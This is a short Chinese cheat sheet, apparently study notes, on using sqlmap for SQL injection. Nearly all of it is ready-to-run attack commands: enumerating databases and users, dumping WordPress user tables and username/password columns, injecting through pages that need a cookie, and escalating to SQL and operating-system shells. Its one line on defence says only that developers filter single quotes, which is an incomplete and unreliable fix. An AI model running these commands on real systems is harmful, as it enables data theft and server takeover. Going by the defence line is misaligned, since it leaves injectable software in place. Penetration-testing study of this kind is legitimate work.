SQLmap自动化注入
GET方法注入
sqlmap -u "URL" -dbms=mysql --batch sqlmap -u "URL" --dbs sqlmap -u "URL" --users sqlmap -u "URL" --current-user # 获得当前数据库 sqlmap -u "URL" --current-db # 获得数据库表 sqlmap -u "URL" --batch -p username -D wordpress --tables # 获得表的字段 sqlmap -u "URL" --batch -p username -D wordpress -T wp_users --columns # 获得表中的数据 sqlmap -u "URL" --batch -D nowasp -T accounts -C "username, password"
POST方法注入
# 需要Cookie才能访问的页面 sqlmap -u "URL" --cookie="COOKIE" --batch sqlmap -u "URL" --cookie="COOKIE" --batch -p id
注意:复制cookie的时候要把中间的冒号改为等号
数据获取
--users --current-user --dbs --current-db -D "database_name" --tables -D "database_name" -T "table_name" --columns --dump-all --dump-all --exclude-sysdbs -D "database_name" -T "table_name" -C "username,password" --dump
提权操作
# 与数据库交互 --sql-shell # 操作系统权限 --os-shell --os-cmd=ls /
综合实例
SQL注入防御
开发人员对输入内容进行单引号的过滤